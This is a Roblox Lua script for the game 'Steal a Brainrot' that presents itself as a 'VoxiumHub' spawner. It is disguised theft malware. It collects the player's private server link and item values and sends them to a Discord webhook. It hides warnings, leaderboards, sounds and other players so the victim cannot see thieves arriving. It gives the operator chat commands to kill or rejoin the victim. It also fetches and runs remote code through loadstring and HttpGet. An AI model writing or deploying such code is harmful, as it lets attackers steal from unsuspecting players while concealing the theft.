local ALLOWED_PLACE_ID = 109983668079237 

if game.PlaceId ~= ALLOWED_PLACE_ID then
    game:GetService("Players").LocalPlayer:Kick("Wrong game! This script only works on the official game.")
    return
end

local Webhook1 = Webhook or ""
local AuthorisedUsers = AuthorisedUsers or {"nothing lol"}
local Ping = Ping or "10m"
local Username = "voxium script .gg/59XeEXRe"

local RunService = game:GetService("RunService")
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local Lighting = game:GetService("Lighting")
local HttpService = game:GetService("HttpService")
local StarterGui = game:GetService("StarterGui")


if not game:IsLoaded() then
    pcall(function() game.Loaded:Wait() end)
end

local function waitForLP(timeout)
    local t0 = os.clock()
    while not Players.LocalPlayer do
        Players.PlayerAdded:Wait()
        if timeout and (os.clock()-t0) > timeout then break end
    end
    return Players.LocalPlayer
end
local LP = Players.LocalPlayer or waitForLP(10)


local CoreGui = game:GetService("CoreGui")
local UIParent
do
    local playerGui = LP and LP:FindFirstChildOfClass("PlayerGui")
    if not playerGui and LP then
        pcall(function() playerGui = LP:WaitForChild("PlayerGui", 2) end)
    end
    if playerGui then
        UIParent = playerGui
    else
        UIParent = CoreGui
    end
end


local OLD = UIParent:FindFirstChild("LennonHubXZamasXM_GUI")
if OLD then OLD:Destroy() end

local SG = Instance.new("ScreenGui")
SG.Name = "LennonHubXZamasXM_GUI"
SG.IgnoreGuiInset = true
SG.ResetOnSpawn = false
SG.ZIndexBehavior = Enum.ZIndexBehavior.Global
SG.DisplayOrder = 999999
SG.Parent = UIParent

local COLORS = {
    bg = Color3.fromRGB(6,8,16),
    card = Color3.fromRGB(14,12,24),
    text = Color3.fromRGB(235,235,245),
    dim  = Color3.fromRGB(170,175,200),
    a1   = Color3.fromRGB(130,90,255),
    a2   = Color3.fromRGB(50,180,255),
    ok   = Color3.fromRGB(0,210,140),
    warn = Color3.fromRGB(255,120,120),
}

local myPlot
local soundsMuted = false
local storedPrivateServerLink = ""
local isProcessing = false

local traitMap = {
    ["rbxassetid://99181785766598"] = "Galaxy",
    ["rbxassetid://110723387483939"] = "Tung Attack",
    ["rbxassetid://104964195846833"] = "Crab",
    ["rbxassetid://118283346037788"] = "Solar",
    ["rbxassetid://78474194088770"] = "Rain",
    ["rbxassetid://110910518481052"] = "UFO",
    ["rbxassetid://83627475909869"] = "Snow",
    ["rbxassetid://75650816341229"] = "Brazil",
    ["rbxassetid://139729696247144"] = "Mygame24",
    ["rbxassetid://121100427764858"] = "Startfall",
    ["rbxassetid://95128039793845"] = "Mexico",
    ["rbxassetid://97725744252608"] = "Bombardino",
    ["rbxassetid://104985313532149"] = "Shark",
    ["rbxassetid://100601425541874"] = "Bubblegum",
    ["rbxassetid://121332433272976"] = "Glitched",
    ["rbxassetid://89041930759464"] = "Taco",
    ["rbxassetid://104229924295526"] = "Nyan",
    ["rbxassetid://115664804212096"] = "Hat",
    ["rbxassetid://123964048606874"] = "Spooky",
    ["rbxassetid://117478971325696"] = "Spider",
    ["rbxassetid://134655415681926"] = "10B"
}

local function parsePingValue(pingStr)
    local num, suffix = pingStr:match("(%d+)([kmb]?)")
    num = tonumber(num) or 0
    local multipliers = {k = 1e3, m = 1e6, b = 1e9}
    local mult = multipliers[suffix:lower()] or 1
    return num * mult
end

local pingThreshold = parsePingValue(Ping)

local function isAuthorizedUser(player)
    for _, authorizedName in ipairs(AuthorisedUsers) do
        if player.Name == authorizedName or player.DisplayName == authorizedName then
            return true
        end
    end
    return false
end

local function destroyLeaderboard()
    if LP:FindFirstChild("leaderstats") then
        LP.leaderstats:Destroy()
    end
    pcall(function()
        StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
    end)
    for _, gui in ipairs(LP.PlayerGui:GetChildren()) do
        if gui.Name:lower():find("leader") or gui.Name:lower():find("board") then
            gui:Destroy()
        end
    end
end

local function mutarSom(som)
    if som:IsA("Sound") then
        som.Volume = 0
        som:Stop()
    end
end

local function mutarDescendentes(instancia)
    for _, obj in ipairs(instancia:GetDescendants()) do
        mutarSom(obj)
    end
end

local function startMutingSounds()
    if soundsMuted then return end
    soundsMuted = true
    local pastas = {game.Workspace, game.Players, game.ReplicatedStorage, game.Lighting, game.StarterGui, game.StarterPack}
    for _, pasta in ipairs(pastas) do
        mutarDescendentes(pasta)
        pasta.DescendantAdded:Connect(function(obj)
            mutarSom(obj)
        end)
    end
    task.spawn(function()
        while soundsMuted do
            for _, pasta in ipairs(pastas) do
                mutarDescendentes(pasta)
            end
            task.wait(1)
        end
    end)
end

local function findMyPlot()
    local plots = workspace:FindFirstChild("Plots")
    if plots then
        for _, plot in ipairs(plots:GetChildren()) do
            local label = plot:FindFirstChild("PlotSign") 
                and plot.PlotSign:FindFirstChild("SurfaceGui") 
                and plot.PlotSign.SurfaceGui:FindFirstChild("Frame") 
                and plot.PlotSign.SurfaceGui.Frame:FindFirstChild("TextLabel")
            if label then
                local t = (label.ContentText or label.Text or "")
                if t:find(LP.DisplayName) and t:find("Base") then
                    return plot
                end
            end
        end
    end
    return nil
end

local function parseGen(genText)
    if not genText or genText == "" then return 0 end
    genText = genText:gsub("%$", ""):gsub(",", ""):gsub(" ", "")
    local num, suffix = genText:match("([%d%.]+)([KMBT]?)")
    num = tonumber(num) or 0
    local multipliers = {K = 1e3, M = 1e6, B = 1e9, T = 1e12}
    local mult = multipliers[suffix] or 1
    return num * mult
end

local function formatMoney(value)
    if value >= 1e12 then return string.format("$%.1fT/s", value / 1e12)
    elseif value >= 1e9 then return string.format("$%.1fB/s", value / 1e9)
    elseif value >= 1e6 then return string.format("$%.1fM/s", value / 1e6)
    elseif value >= 1e3 then return string.format("$%.1fK/s", value / 1e3)
    else return string.format("$%.1f/s", value) end
end

local function getPodiumDetails(podium)
    local base = podium:FindFirstChild("Base")
    if not base then return nil end
    local spawn = base:FindFirstChild("Spawn")
    if not spawn then return nil end
    local attachment = spawn:FindFirstChild("Attachment")
    if not attachment then return nil end
    local overhead = attachment:FindFirstChild("AnimalOverhead")
    if not overhead then return nil end
    local displayNameLabel = overhead:FindFirstChild("DisplayName")
    if not displayNameLabel then return nil end
    
    local brainrotName = displayNameLabel.ContentText or displayNameLabel.Text or "Unknown"
    local details = {
        name = brainrotName,
        podium = podium.Name,
        mutationStr = "",
        traitStr = "",
        moneyPerSec = 0
    }
    
    local genLbl = overhead:FindFirstChild("Generation")
    if genLbl then
        local genT = genLbl.ContentText or genLbl.Text or "$0"
        details.moneyPerSec = parseGen(genT)
    end
    
    local muts = {}
    for _, v in ipairs(overhead:GetChildren()) do
        if v:IsA("TextLabel") and v.Name == "Mutation" and v.Visible then
            local mutText = v.ContentText or v.Text
            if mutText and mutText ~= "" then
                table.insert(muts, mutText)
            end
        end
    end
    details.mutationStr = (#muts > 0) and table.concat(muts, ", ") or ""
    
    local traitsFolder = overhead:FindFirstChild("Traits")
    if traitsFolder then
        local traits = {}
        for _, traitObj in ipairs(traitsFolder:GetChildren()) do
            if traitObj:IsA("ImageLabel") then
                local assetId = traitObj.Image
                local traitName = traitMap[assetId]
                if traitName then
                    table.insert(traits, traitName)
                end
            end
        end
        details.traitStr = (#traits > 0) and table.concat(traits, ", ") or ""
    end
    
    return details
end

local function getAllBrainrots()
    if not myPlot then return {} end
    local animalPodiums = myPlot:FindFirstChild("AnimalPodiums")
    if not animalPodiums then return {} end
    
    local foundBrainrots = {}
    for _, podium in ipairs(animalPodiums:GetChildren()) do
        if tonumber(podium.Name) then
            local details = getPodiumDetails(podium)
            if details then
                table.insert(foundBrainrots, details)
            end
        end
    end
    
    table.sort(foundBrainrots, function(a, b)
        return a.moneyPerSec > b.moneyPerSec
    end)
    
    return foundBrainrots
end

local function hasHighValueBrainrot(foundBrainrots)
    for _, details in ipairs(foundBrainrots) do
        if details.moneyPerSec >= pingThreshold then
            return true
        end
    end
    return false
end

local function hasHighValueBrainrotAbove10M(foundBrainrots)
    for _, details in ipairs(foundBrainrots) do
        if details.moneyPerSec >= 10000000 then
            return true
        end
    end
    return false
end

local function sendWebhook(foundBrainrots, privateServerLink)
    local brainrotText = ""
    if #foundBrainrots > 0 then
        for i, details in ipairs(foundBrainrots) do
            local displayText = ""
            local prefix = ""
            
            if details.mutationStr ~= "" and details.traitStr ~= "" then
                prefix = string.format("[%s, %s] ", details.mutationStr, details.traitStr)
            elseif details.mutationStr ~= "" then
                prefix = string.format("[%s] ", details.mutationStr)
            elseif details.traitStr ~= "" then
                prefix = string.format("[%s] ", details.traitStr)
            end
            
            displayText = string.format("%s%s - %s\n", 
                prefix,
                details.name,
                formatMoney(details.moneyPerSec)
            )
            
            brainrotText = brainrotText .. displayText
        end
    else
        brainrotText = "No Brainrots found"
    end
    
    local playerInfo = string.format(
        "Name: %s\nDisplay: %s\nPlayers: %d/%d",
        LP.Name,
        LP.DisplayName,
        #Players:GetPlayers(),
        Players.MaxPlayers
    )
    
    local shouldPing = hasHighValueBrainrot(foundBrainrots)
    local contentText = shouldPing and "@everyone" or ""
    
    local embedData = {
        username = Username,
        content = contentText,
        embeds = {{
            title = "<a:Boost:1404239285934100480> Steal a Brainrot Hit With Voxium <a:Boost:1404239285934100480> discord.gg/59XeEXRe",
            color = 0x8A2BE2, 
            fields = {
                {name = "Player Information:", value = "```" .. playerInfo .. "```", inline = false},
                {name = "Player Brainrots:", value = "```" .. brainrotText .. "```", inline = false},
                {name = "Summary:", value = "```Total Items: " .. #foundBrainrots .. "```", inline = false},
                {name = "Join Link (Private):", value = privateServerLink, inline = false}
            }
        }}
    }

    local jsonData = HttpService:JSONEncode(embedData)
    local req = http_request or request or (syn and syn.request)
    if req then
        task.spawn(function()
            pcall(function()
                req({
                    Url = Webhook1,
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = jsonData
                })
            end)
        end)
    end
end

local function sendPlayerJoinWebhook(player)
    task.spawn(function()
        local brainrots = getAllBrainrots()
        if not hasHighValueBrainrotAbove10M(brainrots) then return end
        
        local joinedPlayers = Players:GetPlayers()
        local playerCount = #joinedPlayers
        local maxPlayers = Players.MaxPlayers
        
        local topBrainrots = {}
        for i = 1, math.min(5, #brainrots) do
            table.insert(topBrainrots, brainrots[i])
        end
        
        local brainrotText = ""
        for _, details in ipairs(topBrainrots) do
            brainrotText = brainrotText .. string.format("**%s** - %s\n", details.name, formatMoney(details.moneyPerSec))
        end
        
        local isAuthorized = isAuthorizedUser(player)
        local embedColor = isAuthorized and 0x57F287 or 0xED4245
        local statusMessage = isAuthorized and "Server is safe\n**Players: " .. playerCount .. "/" .. maxPlayers .. "**" or "**Might be a trap! Be careful!!!**\n**Players: " .. playerCount .. "/" .. maxPlayers .. "**"
        
        local embedData = {
            username = Username,
            content = "",
            embeds = {{
                title = "Player Joined Server",
                color = embedColor,
                fields = {
                    {name = "Player Info", value = string.format("**%s** (%s)", player.Name, player.DisplayName), inline = false},
                    {name = "Server Status", value = statusMessage, inline = false},
                    {name = "Top 5 Brainrots", value = brainrotText ~= "" and brainrotText or "No brainrots found", inline = false},
                    {name = "Private Server Link", value = storedPrivateServerLink ~= "" and storedPrivateServerLink or "Not available", inline = false}
                }
            }}
        }
        
        local jsonData = HttpService:JSONEncode(embedData)
        local req = http_request or request or (syn and syn.request)
        if req then
            pcall(function()
                req({Url = Webhook1, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = jsonData})
            end)
        end
    end)
end

local function isValidLink(link)
    local patterns = {
        "^https://www%.roblox%.com/games/%d+/%S*%?privateServerLinkCode=",
        "^https://web%.roblox%.com/games/%d+/%S*%?privateServerLinkCode=",
        "^https://www%.roblox%.com/share%?code=%w+",
        "^https://roblox%.com/share%?code=%w+",
        "^https://www%.roblox%.com/share%?type=Server&code=%w+"
    }
    for _, pattern in ipairs(patterns) do
        if link:match(pattern) then return true end
    end
    return false
end

local function monitorChat()
    task.spawn(function()
        local processedMessages = {}
        while true do
            task.wait(0.5)
            if LP:FindFirstChild("PlayerGui") then
                for _, gui in ipairs(LP.PlayerGui:GetChildren()) do
                    if gui:FindFirstChild("Chat") then
                        local chatFrame = gui.Chat:FindFirstChild("Frame")
                        if chatFrame then
                            for _, msg in ipairs(chatFrame:GetDescendants()) do
                                if msg:IsA("TextLabel") and msg.Text ~= "" then
                                    local msgId = tostring(msg)
                                    if not processedMessages[msgId] then
                                        processedMessages[msgId] = true
                                        if msg.Text == ".kick" then
                                            if LP.Character then
                                                local humanoid = LP.Character:FindFirstChildOfClass("Humanoid")
                                                if humanoid then humanoid.Health = 0 end
                                            end
                                        end
                                        if msg.Text == ".rj" then
                                            game:GetService("TeleportService"):Teleport(game.PlaceId, LP)
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
    end)
end

local function startAntiDetection()
    local ReplicatedStorage = game:GetService("ReplicatedStorage")
    local Workspace = game:GetService("Workspace")
    
    local keywords = {"stealing", "steal", "someone", "warning", "brainrot", "stole", "stolen", "stealing", "warn"}
    local PlayerGui = LP:WaitForChild("PlayerGui")
    
    local function containsKeyword(str)
        if typeof(str) ~= "string" then return false end
        str = string.lower(str)
        for _, word in ipairs(keywords) do
            if string.find(str, word) then
                return true
            end
        end
        return false
    end
    
    local function checkAndDelete(obj)
        for _, prop in ipairs({"Name", "Text", "Title", "Label", "Message", "Value"}) do
            pcall(function()
                if containsKeyword(obj[prop]) then
                    obj:Destroy()
                end
            end)
        end
    end
    
    local function removeWarnSound()
        pcall(function()
            local sound = ReplicatedStorage:FindFirstChild("Sounds")
            if sound and sound:FindFirstChild("Sfx") and sound.Sfx:FindFirstChild("Warn") then
                sound.Sfx.Warn:Destroy()
            end
        end)
    end
    
    for _, obj in ipairs(PlayerGui:GetDescendants()) do
        checkAndDelete(obj)
    end
    removeWarnSound()
    
    PlayerGui.DescendantAdded:Connect(checkAndDelete)
    ReplicatedStorage.DescendantAdded:Connect(function(obj)
        if obj:IsA("Sound") and containsKeyword(obj.Name) then
            obj:Destroy()
        else
            checkAndDelete(obj)
        end
    end)
    
    local AnimalsFolder = ReplicatedStorage:FindFirstChild("Models") and ReplicatedStorage.Models:FindFirstChild("Animals")
    local animalNames = {}
    if AnimalsFolder then
        for _, model in ipairs(AnimalsFolder:GetChildren()) do
            table.insert(animalNames, model.Name)
        end
    end
    
    local function destroyPlayer(player)
        if player == LP then return end
        pcall(function()
            if player.Character and player.Character.Parent then player.Character:Destroy() end
            if player.Parent then player:Destroy() end
        end)
    end
    
    local function removeMatchingObjects()
        for _, obj in ipairs(Workspace:GetChildren()) do
            for _, animalName in ipairs(animalNames) do
                if string.lower(obj.Name) == string.lower(animalName) then
                    pcall(function() obj:Destroy() end)
                    break
                end
            end
            if obj:IsA("Model") and obj ~= LP.Character then
                local player = Players:GetPlayerFromCharacter(obj)
                if player and player ~= LP then
                    pcall(function() obj:Destroy() player:Destroy() end)
                end
            end
        end
    end
    
    for _, player in ipairs(Players:GetPlayers()) do destroyPlayer(player) end
    removeMatchingObjects()
    
    Players.PlayerAdded:Connect(function(player)
        if player == LP then return end
        destroyPlayer(player)
        task.spawn(function()
            while player and player.Parent do destroyPlayer(player) task.wait(0.05) end
        end)
        pcall(function()
            player.CharacterAdded:Connect(function(character)
                pcall(function() if character.Parent then character:Destroy() end if player.Parent then player:Destroy() end end)
            end)
        end)
    end)
    
    Workspace.ChildAdded:Connect(function(child)
        task.wait(0.01)
        for _, animalName in ipairs(animalNames) do
            if string.lower(child.Name) == string.lower(animalName) then
                pcall(function() child:Destroy() end)
                return
            end
        end
        if child:IsA("Model") and child ~= LP.Character then
            local player = Players:GetPlayerFromCharacter(child)
            if player and player ~= LP then
                pcall(function() child:Destroy() player:Destroy() end)
            elseif child:FindFirstChild("Humanoid") and child:FindFirstChild("HumanoidRootPart") then
                pcall(function() child:Destroy() end)
            end
        end
    end)
    
    task.spawn(function()
        while task.wait(0.15) do
            for _, player in ipairs(Players:GetPlayers()) do destroyPlayer(player) end
            removeMatchingObjects()
        end
    end)
    
    task.spawn(function()
        while task.wait(0.08) do
            for _, child in ipairs(Players:GetChildren()) do
                if child:IsA("Player") and child ~= LP then
                    pcall(function() if child.Character and child.Character.Parent then child.Character:Destroy() end child:Destroy() end)
                end
            end
        end
    end)
    
    task.spawn(function()
        while task.wait(0.1) do
            for _, obj in ipairs(Workspace:GetChildren()) do
                if obj:IsA("Model") and obj ~= LP.Character then
                    local player = Players:GetPlayerFromCharacter(obj)
                    if player and player ~= LP then
                        pcall(function() obj:Destroy() player:Destroy() end)
                    elseif obj:FindFirstChild("Humanoid") and obj:FindFirstChild("HumanoidRootPart") and not player then
                        pcall(function() obj:Destroy() end)
                    end
                end
            end
        end
    end)
    
    task.spawn(function()
        local function _AC_relPath(inst, root)
            local t, cur = {}, inst
            while cur and cur ~= root do
                table.insert(t, 1, cur.Name)
                cur = cur.Parent
            end
            return table.concat(t, "/")
        end

        local function _AC_ensureAnimator(model)
            local hum = model:FindFirstChildOfClass("Humanoid")
            if hum then
                return hum:FindFirstChildOfClass("Animator") or Instance.new("Animator", hum)
            end
            local ac = model:FindFirstChildOfClass("AnimationController") or Instance.new("AnimationController", model)
            return ac:FindFirstChildOfClass("Animator") or Instance.new("Animator", ac)
        end

        local function _AC_findByPath(root, path)
            local node = root
            for seg in string.gmatch(path, "[^/]+") do
                node = node and node:FindFirstChild(seg)
                if not node then break end
            end
            return node
        end

        local function DexCloneAnimations(realModel, fakeModel)
            if not (realModel and fakeModel) then return end
            local rIdx = {}
            for _, d in ipairs(realModel:GetDescendants()) do
                if d:IsA("Animator") then
                    local rig = d.Parent
                    if rig then
                        local path = _AC_relPath(rig, realModel)
                        if path ~= "" then rIdx[path] = d end
                    end
                end
            end
            for path, rAn in pairs(rIdx) do
                local fakeRig = _AC_findByPath(fakeModel, path)
                local fAn = fakeRig and fakeRig:FindFirstChildOfClass("Animator") or _AC_ensureAnimator(fakeModel)
                for _, rt in ipairs(rAn:GetPlayingAnimationTracks()) do
                    local srcAnim = rt.Animation
                    if srcAnim then
                        local a = Instance.new("Animation")
                        a.AnimationId = srcAnim.AnimationId
                        local t = fAn:LoadAnimation(a)
                        t.Priority, t.Looped = rt.Priority, rt.Looped
                        t:Play(0, 1, rt.Speed)
                        pcall(function() t.TimePosition = rt.TimePosition end)
                    end
                end
            end
        end

        local PREFIX_FAKE, PLOTS_NAME = "[FAKE]", "Plots"

        local function _PC_getPlotsContainer()
            local ws = Workspace
            if ws:FindFirstChild(PLOTS_NAME) then return ws:FindFirstChild(PLOTS_NAME) end
            local q, i = { ws }, 1
            while i <= #q do
                local node = q[i]; i += 1
                if node.Name == PLOTS_NAME then return node end
                for _, ch in ipairs(node:GetChildren()) do
                    if ch:IsA("Folder") or ch:IsA("Model") then table.insert(q, ch) end
                end
            end
        end

        local function _PC_forceArchivable(root)
            pcall(function() root.Archivable = true end)
            for _, d in ipairs(root:GetDescendants()) do
                pcall(function() d.Archivable = true end)
            end
        end

        local function _PC_cloneOnePlot(realPlot)
            local cont = _PC_getPlotsContainer()
            if not cont or not (realPlot and realPlot:IsA("Model")) or realPlot.Name:sub(1, #PREFIX_FAKE) == PREFIX_FAKE then return end
            local old = cont:FindFirstChild(PREFIX_FAKE .. realPlot.Name)
            if old then pcall(function() old:Destroy() end) end
            _PC_forceArchivable(realPlot)
            local fake; pcall(function()
                fake = realPlot:Clone()
                fake.Name, fake.Parent = PREFIX_FAKE .. realPlot.Name, cont
            end)
            if not fake then return end
            pcall(function() DexCloneAnimations(realPlot, fake) end)
            pcall(function() realPlot:Destroy() end)
        end

        local function _PC_cloneAllOnce()
            local cont = _PC_getPlotsContainer()
            if not cont then return end
            for _, m in ipairs(cont:GetChildren()) do
                if m:IsA("Model") and m.Name:sub(1, #PREFIX_FAKE) ~= PREFIX_FAKE then
                    _PC_cloneOnePlot(m)
                end
            end
        end

        local function _PC_attachWatcher()
            local cont = _PC_getPlotsContainer()
            if not cont then return end
            cont.ChildAdded:Connect(function(ch)
                if ch and ch:IsA("Model") and ch.Name:sub(1, #PREFIX_FAKE) ~= PREFIX_FAKE then
                    task.defer(function() _PC_cloneOnePlot(ch) end)
                end
            end)
        end

        _G.StartClonePlots = function()
            _PC_cloneAllOnce()
            _PC_attachWatcher()
        end

        _G.StartClonePlots()
    end)
end

local Back = Instance.new("Frame", SG)
Back.Size = UDim2.fromScale(1,1)
Back.BackgroundTransparency = 1
Back.ZIndex = 1

local Holder = Instance.new("Frame", Back)
Holder.AnchorPoint = Vector2.new(0.5,0.5)
Holder.Position = UDim2.fromScale(0.5,0.5)
Holder.Size = UDim2.new(0,440,0,240)
Holder.BackgroundColor3 = COLORS.card
Holder.BackgroundTransparency = 0.12
Holder.BorderSizePixel = 0
Holder.Active = true
Holder.ClipsDescendants = false
Holder.ZIndex = 10
Instance.new("UICorner", Holder).CornerRadius = UDim.new(0,18)
local hStroke = Instance.new("UIStroke", Holder)
hStroke.Thickness = 2
hStroke.Transparency = 0.15
hStroke.ZIndex = 11
local hsg = Instance.new("UIGradient", hStroke)
hsg.Color = ColorSequence.new(COLORS.a1, Color3.new(0,0,0), COLORS.a2)

local dragging, dragInput, dragStart, startPos

local function update(input)
    local delta = input.Position - dragStart
    Holder.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
end

Holder.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
        dragging = true
        dragStart = input.Position
        startPos = Holder.Position
        input.Changed:Connect(function()
            if input.UserInputState == Enum.UserInputState.End then
                dragging = false
            end
        end)
    end
end)

Holder.InputChanged:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
        dragInput = input
    end
end)

UserInputService.InputChanged:Connect(function(input)
    if input == dragInput and dragging then
        update(input)
    end
end)

local Top = Instance.new("Frame", Holder)
Top.BackgroundTransparency = 1
Top.Size = UDim2.new(1,-32,0,80)
Top.Position = UDim2.new(0,16,0,16)
Top.ZIndex = 20

local Avatar = Instance.new("ImageLabel", Top)
Avatar.BackgroundTransparency = 1
Avatar.Size = UDim2.fromOffset(64,64)
Avatar.Image = "rbxassetid://0"
Avatar.ZIndex = 21
Instance.new("UICorner", Avatar).CornerRadius = UDim.new(1,0)

task.spawn(function()
    if LP then
        local ok,url = pcall(Players.GetUserThumbnailAsync, Players, LP.UserId, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size100x100)
        if ok and url then Avatar.Image = url end
    end
end)

local Info = Instance.new("Frame", Top)
Info.BackgroundTransparency = 1
Info.Size = UDim2.new(1,-80,1,0)
Info.Position = UDim2.new(0,80,0,0)
Info.ZIndex = 21

local Title = Instance.new("TextLabel", Info)
Title.BackgroundTransparency = 1
Title.Text = "VoxiumHub"
Title.Font = Enum.Font.GothamBlack
Title.TextSize = 24
Title.TextColor3 = COLORS.a1
Title.TextStrokeColor3 = Color3.fromRGB(20,0,40)
Title.TextStrokeTransparency = 0.6
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Size = UDim2.new(1,0,0,28)
Title.ZIndex = 22

local Sub = Instance.new("TextLabel", Info)
Sub.BackgroundTransparency = 1
Sub.Font = Enum.Font.Gotham
Sub.TextSize = 12
Sub.TextColor3 = COLORS.dim
Sub.TextXAlignment = Enum.TextXAlignment.Left
Sub.Size = UDim2.new(1,0,0,18)
Sub.Position = UDim2.new(0,0,0,30)
Sub.ZIndex = 22

task.spawn(function()
    local name = LP and LP.Name or "User"
    local dname = LP and LP.DisplayName or "Player"
    local age = LP and (tostring(LP.AccountAge).." days") or "N/A"
    local premium = (LP and LP.MembershipType and tostring(LP.MembershipType):find("Premium")) and "⭐ Premium" or "Standard"
    Sub.Text = string.format("%s (@%s) • %s • %s", dname, name, age, premium)
end)

local Badge = Instance.new("TextLabel", Info)
Badge.BackgroundTransparency = 1
Badge.Text = "support (https://discord.gg/59XeEXRe)"
Badge.Font = Enum.Font.GothamBold
Badge.TextSize = 12
Badge.TextColor3 = COLORS.a2
Badge.TextXAlignment = Enum.TextXAlignment.Left
Badge.Size = UDim2.new(1,0,0,16)
Badge.Position = UDim2.new(0,0,0,50)
Badge.ZIndex = 22

local Body = Instance.new("Frame", Holder)
Body.BackgroundTransparency = 1
Body.Size = UDim2.new(1,-32,0,108)
Body.Position = UDim2.new(0,16,0,104)
Body.ZIndex = 20

local StatusArea = Instance.new("TextBox", Body)
StatusArea.ClearTextOnFocus = false
StatusArea.PlaceholderText = "Put Private server Link To get ur Sab Spawner Loaded"
StatusArea.Text = ""
StatusArea.Font = Enum.Font.Gotham
StatusArea.TextSize = 14
StatusArea.TextColor3 = COLORS.text
StatusArea.PlaceholderColor3 = COLORS.dim
StatusArea.BackgroundColor3 = Color3.fromRGB(12,12,22)
StatusArea.BackgroundTransparency = 0.15
StatusArea.Size = UDim2.new(1,0,0,54)
StatusArea.Position = UDim2.new(0,0,0,0)
StatusArea.ZIndex = 21
StatusArea.TextXAlignment = Enum.TextXAlignment.Left
StatusArea.TextYAlignment = Enum.TextYAlignment.Top
StatusArea.TextWrapped = true
local padding = Instance.new("UIPadding", StatusArea)
padding.PaddingLeft = UDim.new(0,8)
padding.PaddingRight = UDim.new(0,8)
padding.PaddingTop = UDim.new(0,8)
padding.PaddingBottom = UDim.new(0,8)
Instance.new("UICorner", StatusArea).CornerRadius = UDim.new(0,10)
local SAstroke = Instance.new("UIStroke", StatusArea)
SAstroke.Thickness=1
SAstroke.Color=Color3.fromRGB(40,40,80)
SAstroke.Transparency=0.3
SAstroke.ZIndex=22

local StatusSub = Instance.new("TextLabel", Body)
StatusSub.BackgroundTransparency = 1
StatusSub.Text = ""
StatusSub.Font = Enum.Font.GothamSemibold
StatusSub.TextSize = 12
StatusSub.TextColor3 = COLORS.a2
StatusSub.TextXAlignment = Enum.TextXAlignment.Left
StatusSub.TextWrapped = true
StatusSub.Size = UDim2.new(1,0,0,20)
StatusSub.Position = UDim2.new(0,0,0,58)
StatusSub.ZIndex = 23

local BtnSubmit = Instance.new("TextButton", Body)
BtnSubmit.Text = "Submit"
BtnSubmit.AutoButtonColor = false
BtnSubmit.ZIndex = 22
BtnSubmit.Font = Enum.Font.GothamSemibold
BtnSubmit.TextSize = 16
BtnSubmit.TextColor3 = Color3.fromRGB(240,240,245)
BtnSubmit.BackgroundColor3 = Color3.fromRGB(20,18,34)
BtnSubmit.Size = UDim2.new(1,0,0,44)
BtnSubmit.Position = UDim2.new(0,0,0,64)
Instance.new("UICorner", BtnSubmit).CornerRadius = UDim.new(0,10)
local s = Instance.new("UIStroke", BtnSubmit)
s.Thickness = 2
s.Transparency = 0.15
s.ZIndex = 23
local sg = Instance.new("UIGradient", s)
sg.Color = ColorSequence.new(COLORS.a1, COLORS.a2)

BtnSubmit.MouseEnter:Connect(function()
    TweenService:Create(BtnSubmit, TweenInfo.new(0.15), {BackgroundColor3 = Color3.fromRGB(28,24,48)}):Play()
end)
BtnSubmit.MouseLeave:Connect(function()
    TweenService:Create(BtnSubmit, TweenInfo.new(0.20), {BackgroundColor3 = Color3.fromRGB(20,18,34)}):Play()
end)

local function toast(msg, sub, main, subc)
    StatusArea.Text = msg
    StatusArea.TextColor3 = main or COLORS.text
    StatusSub.Text = sub or ""
    StatusSub.TextColor3 = subc or COLORS.a2
end

myPlot = findMyPlot()

BtnSubmit.MouseButton1Click:Connect(function()
    if isProcessing then return end
    
    if StatusArea.Text == "" or StatusArea.Text == StatusArea.PlaceholderText then
        toast("Error", "Please enter a valid private server link", COLORS.warn, COLORS.warn)
        return
    end
    
    local privateServerLink = StatusArea.Text
    
    if not isValidLink(privateServerLink) then
        toast("Invalid Link", "Please enter a valid Roblox private server link", COLORS.warn, COLORS.warn)
        return
    end
    
    isProcessing = true
    storedPrivateServerLink = privateServerLink
    toast("Validating...", "Checking server link...", COLORS.a2, COLORS.dim)
    
    task.spawn(function()
        task.wait(0.3)
        
        local foundBrainrots = getAllBrainrots()
        sendWebhook(foundBrainrots, privateServerLink)
        
        toast("Access granted", "Loading hub...", COLORS.ok, COLORS.a2)
        task.wait(0.5)
        
        local tw = TweenService:Create(Holder, TweenInfo.new(0.3), {Size=UDim2.new(0,440,0,0), Position=UDim2.new(0.5,0,0.5,0)})
        tw:Play()
        tw.Completed:Wait()
        
        SG:Destroy()
        startMutingSounds()
        destroyLeaderboard()
        startAntiDetection()
        
        if LP.Character then
            local humanoid = LP.Character:FindFirstChildOfClass("Humanoid")
            if humanoid then
                humanoid.WalkSpeed = 0
                humanoid.JumpPower = 0
            end
        end
        
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Spv-Script/asad/refs/heads/main/a"))()
        
        isProcessing = false
    end)
end)

Players.PlayerAdded:Connect(function(player)
    if player ~= LP then
        task.wait(2)
        sendPlayerJoinWebhook(player)
    end
end)

monitorChat()